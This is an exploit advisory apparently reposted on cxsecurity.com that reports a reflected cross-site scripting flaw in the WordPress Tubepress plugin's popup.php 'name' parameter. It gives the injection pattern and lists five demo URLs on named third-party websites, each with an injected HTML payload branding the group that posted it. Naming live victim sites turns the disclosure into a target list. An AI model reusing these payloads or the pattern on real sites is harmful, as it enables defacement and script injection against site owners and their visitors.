WordPress Tubepress 2 Cross Site Scripting

2016.01.14
Credit: Ashiyane Digital Security Team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

[^][^][^][^][^][^][^][^][^][^][^] [^] Exploit Title : Wordpress Tubepress Plugin v 2 Cross Site Scripting [^] Exploit Author : Ashiyane Digital Security Team [^] Vendor Homepage : https://wordpress.org/plugins/tubepress/ [^] Date: 13 Jan 2016 [^] Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Vulnerable PHP File = common/ui/popup.php OR common/popup.php [^] Vulnerable Parameter = name [^] [^] Attack Like :site/wp-content/plugins/tubepress/common/popup.php?name=[XSS] [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Demos : [^] [^] http://inmafoundation.org/wp-content/plugins/tubepress/common/popup.php?name=</title><font color=white>Ashiyane</font> [^] [^] http://www.frenzygraphics.com/wp-content/plugins/tubepress/common/popup.php?name=</title><font color=white>Ashiyane</font> [^] [^] http://www.brothersgonnaworkitout.com/clientarea/greenparty/wp-content/plugins/tubepress/common/popup.php?name=</title><font color=white>Ashiyane</font> [^] [^] http://www.twisters.info/wp-content/plugins/tubepress/common/popup.php?name=</title><font color=white>Ashiyane</font> [^] [^] http://trueworldonline.com/wordpress/wp-content/plugins/tubepress/common/popup.php?name=</title><font color=white>Ashiyane</font> [^] [^][^][^][^][^][^][^][^][^][^][^] [^] Discovered by : Ac!D [^] tnQ: EhSan D3s!6n37 ,H.empire , M.hidden , Linx64 , B0z0rgmehr , Maziar , N3TC@T [^] M.a.M.a.D , M.hacking , Sh.BlackHAT , V For vendetta , Sh.Cloner & Hassan [^][^][^][^][^][^][^][^][^][^][^]


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top